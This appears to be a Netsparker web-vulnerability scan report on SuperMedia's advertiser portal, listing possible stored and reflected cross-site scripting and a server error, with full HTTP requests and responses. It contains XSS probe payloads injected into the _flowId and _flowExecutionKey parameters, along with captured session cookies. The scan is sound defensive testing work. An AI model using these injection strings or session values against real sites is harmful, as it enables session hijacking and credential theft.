<input id="hp_remember_me" name="checkbox" type="checkbox" value="checkbox" >Remember me
<br></span>
<span id="bottom"><a href="https://www.supermedia.com/help/account-information/sign-in" title="SNew Clients">New Users</a> | <a href="https://www.supermedia.com/help/account-information/sign-in" title="Sign in help">Sign in help</a></span>
</div>
</div>
[Possible] Permanent Cross-site Scripting

[Possible] Permanent Cross-site Scripting

1 TOTAL
IMPORTANT

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:
  • User session sensitive information such as cookies can be stolen.
  • XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
  • The website can be redirected to a new location, defaced or used as a phishing site.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=http://www.netsparker.com?

Unknown Injection Point

Netsparker did not carry out an attack for this page but identified output of a previously completed XSS attack. This might happen because Netsparker run against this website before.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=http://www.netsparker.com? HTTP/1.1
Referer: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:24 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 5759






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Badly formatted flow execution key ''"--></style></script><script>netsparker(0x000218)</script>', the expected format is '_c<conversationId>_k<continuationId>'";s.prop8="";s.prop9="";s.prop10="E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
Badly formatted flow execution key &#039;http://www.netsparker.com?&#039;, the expected format is &#039;_c&lt;conversationId&gt;_k&lt;continuationId&gt;&#039;
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover(function(){
clearDropDownTimer();
});
});
</script>
<!-- DROP DOWN END -->
<div id="footer" >




<div id="sitemap">

<div class="block first">


<h4>Company:</h4>
<ul>
<li><a href="https://www.supermedia.com/about-us" title="About Us">About Us</a></li>
<li><a href="https://www.supermedia.com/press" title="Press">Press</a></li>
<li><a href="http://ir.supermedia.com" title="Investors">Investors</a></li>
<li><a href="https://www.supermedia.com/careers" title="Careers">Careers</a></li>
<li><a href="https://www.supermedia.com/social-responsibility" title="Social Responsibility">Social Responsibility</a></li>
<li><a href="http://my.supermedia.com/directoryoptout" title="Directory Opt-out">Directory Opt-out</a></li>
</ul>



<h4>Client Solutions:</h4>
<ul>
<li><a href="https://www.supermedia.com/client-solutions/client-stories" title="Client Stories">Client Stories</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-service" title="Local Services">Local Services</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-retail" title="Local Retailers">Local Retailers</a></li>
<li><a href="https://www.supermedia.com/client-solutions/web-based-business" title="Web Businesses">Web Businesses</a></li>
<li><a href="https://www.supermedia.com/client-solutions/national-brand-agencies" title="National Brands & Agencies">National Brands &amp; Agencies</a></li>
<li><a href="https://www.supermedia.com/advertising-goals" title="Advertising Goals...">Advertising Goals...</a></li>
<li><a href="https://www.supermedia.com/client-solutions/share-the-wealth" title="Share the Wealth">Share the Wealth</a></li>
</ul>
</div>
<div class="block">
<h4>Media Network:</h4>
<ul>
<li><a href="https://www.supermedia.com/media-network/our-brands" title="Our Brands">Our Brands</a></li>
&..
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting

1 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=..

Parameters

Parameter Type Value
fromPage GET index
username GET Ronald Smith
password GET 3
GET 3
_flowId GET '"><net sparker=alert(0x00040C)>

Request

GET /spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=3&=3&_flowId='%22%3E%3Cnet%20sparker=netsparker(0x00040C)%3E HTTP/1.1
Referer: https://www.supermedia.com/spportal/indexLogin.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=EF46B22FE38C1DFD3796C73A1E51B52E.app5-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 12:00:06 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6272






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/indexLogin.do";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="No such flow definition with id ''"><net sparker=netsparker(0x00040C)>' found; the flows available are: array<String>['accountAdmin-flow', 'accountreg-flow', 'businessprofile-flow', 'client-consolidation-flow', 'contactus-flow', 'coupon-flow', 'forgotpassword-edit-flow', 'funding-flow', 'lead-maintain-flow', 'listingOrderSummary-flow', 'login-flow', 'loginact-flow', 'maintaincreditcard-flow', 'microsite-flow', 'myaccount-contactinfo-edit-flow', 'myaccount-domains-flow', 'myaccount-email-edit-flow', 'myaccount-emails-flow', 'myaccount-flow', 'myaccount-password-edit-flow', 'myaccount-websites-flow', 'onlinecc-flow', 'ordersummary-flow', 'paypercall-flow', 'pfc-businessprofile-flow', 'pfc-flow', 'pfp-adDesign-flow', 'pfp-categories-flow', 'pfp-elp-flow', 'pfp-geo-flow', 'pfp-keywords-flow', 'photos-flow', 'ppc-advsearch-flow', 'ppc-bidding-flow', 'ppc-create-flow', 'ppc-fullservice-flow', 'ppc-maintain-flow', 'repmanagement-flow', 'reviews-flow', 'sclicks-maintain-flow', 'sharethewealth-flow', 'temporary-password-flow', 'webhosting-addons-flow', 'webhosting-design-flow', 'webhosting-domainnames-flow', 'webhosting-email-products-flow', 'webhosting-websites-flow']";s.prop8="";s.prop9="";s.prop10="EF46B22FE38C1DFD3796C73A1E51B52E.app5-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
No such flow definition with id &#039;&#039;&#034;&gt;&lt;net sparker=netsparker(0x00040C)&gt;&#039; found; the flows available are: array&lt;String&gt;[&#039;accountAdmin-flow&#039;, &#039;accountreg-flow&#039;, &#039;businessprofile-flow&#039;, &#039;client-consolidation-flow&#039;, &#039;contactus-flow&#039;, &#039;coupon-flow&#039;, &#039;forgotpassword-edit-flow&#039;, &#039;funding-flow&#039;, &#039;lead-maintain-flow&#039;, &#039;listingOrderSummary-flow&#039;, &#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;, &#039;microsite-flow&#039;, &#039;myaccount-contactinfo-edit-flow&#039;, &#039;myaccount-domains-flow&#039;, &#039;myaccount-email-edit-flow&#039;, &#039;myaccount-emails-flow&#039;, &#039;myaccount-flow&#039;, &#039;myaccount-password-edit-flow&#039;, &#039;myaccount-websites-flow&#039;, &#039;onlinecc-flow&#039;, &#039;ordersummary-flow&#039;, &#039;paypercall-flow&#039;, &#039;pfc-businessprofile-flow&#039;, &#039;pfc-flow&#039;, &#039;pfp-adDesign-flow&#039;, &#039;pfp-categories-flow&#039;, &#039;pfp-elp-flow&#039;, &#039;pfp-geo-flow&#039;, &#039;pfp-keywords-flow&#039;, &#039;photos-flow&#039;, &#039;ppc-advsearch-flow&#039;, &#039;ppc-bidding-flow&#039;, &#039;ppc-create-flow&#039;, &#039;ppc-fullservice-flow&#039;, &#039;ppc-maintain-flow&#039;, &#039;repmanagement-flow&#039;, &#039;reviews-flow&#039;, &#039;sclicks-maintain-flow&#039;, &#039;sharethewealth-flow&#039;, &#039;temporary-password-flow&#039;, &#039;webhosting-addons-flow&#039;, &#039;webhosting-design-flow&#039;, &#039;webhosting-domainnames-flow&#039;, &#039;webhosting-email-products-flow&#039;, &#039;webhosting-websites-flow&#039;]
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /spportal/spportalFlow.do

/spportal/spportalFlow.do CONFIRMED

https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=_cD8CD9E7F-2CE0-BAC0-8E3D-C3DC..

Parameters

Parameter Type Value
_flowExecutionKey GET _cD8CD9E7F-2CE0-BAC0-8E3D-C3DCB27FFA09_kBF1EB9ED-E594-C86C-D15F-96C1705501CF

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_cD8CD9E7F-2CE0-BAC0-8E3D-C3DCB27FFA09_kBF1EB9ED-E594-C86C-D15F-96C1705501CF HTTP/1.1
Referer: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=&password=&&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
